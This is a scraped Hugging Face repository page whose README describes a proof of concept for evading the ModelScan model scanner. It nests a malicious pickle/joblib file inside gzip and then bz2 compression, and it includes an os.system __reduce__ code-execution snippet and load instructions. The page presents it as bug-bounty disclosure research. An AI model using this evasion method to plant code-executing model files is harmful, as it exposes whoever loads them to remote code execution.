Downloads · 30 days
0
sandeep1337/modelscan-bypass-double-compression
modelscan-bypass-double-compression is a machine learning model from sandeep1337. Use it for the machine learning task on the model card, and read the license before you ship it in a product.
Security Research - ModelScan Bypass Technique
Downloads · 30 days
0
Access
Public
Updated Dec 25, 2025
Repo size
171 B
Likes
0
Public
Click a slice to open those files.
.md2.6 KB · 61%
From the Hugging Face model README
Security Research - ModelScan Bypass Technique
This repository contains a proof-of-concept demonstrating a bypass technique for ModelScan, a popular ML model security scanner. This technique allows malicious pickle-based model files to evade detection.
Nested/double compression
Payload compressed twice (gzip then bz2)
SKIPPED - Scanner did not analyze this file
exploit_double_compression.joblib.gz.bz2# Install ModelScan
pip install modelscan
# Download the exploit file from this repository
# Then scan it
modelscan scan -p exploit_double_compression.joblib.gz.bz2
SKIPPED - Scanner did not analyze this file
import joblib
# WARNING: This will execute arbitrary code!
model = joblib.load('exploit_double_compression.joblib.gz.bz2')
This exploit uses Python's pickle __reduce__ method for RCE:
def __reduce__(self):
import os
return (os.system, ('echo "RCE executed!"',))
Why ModelScan misses this:
Payload compressed twice (gzip then bz2)
Severity: HIGH
Attack Vector:
This is one of four bypass techniques discovered:
This research is being submitted to Huntr's bug bounty program for responsible disclosure.
Date: December 25, 2024 Researcher: Security Research Team
⚠️ For Security Research Only
This file is provided for security research and vulnerability disclosure purposes only. Do not use this technique for malicious purposes. Loading this file will execute code.
Status: Under responsible disclosure to Huntr bug bounty program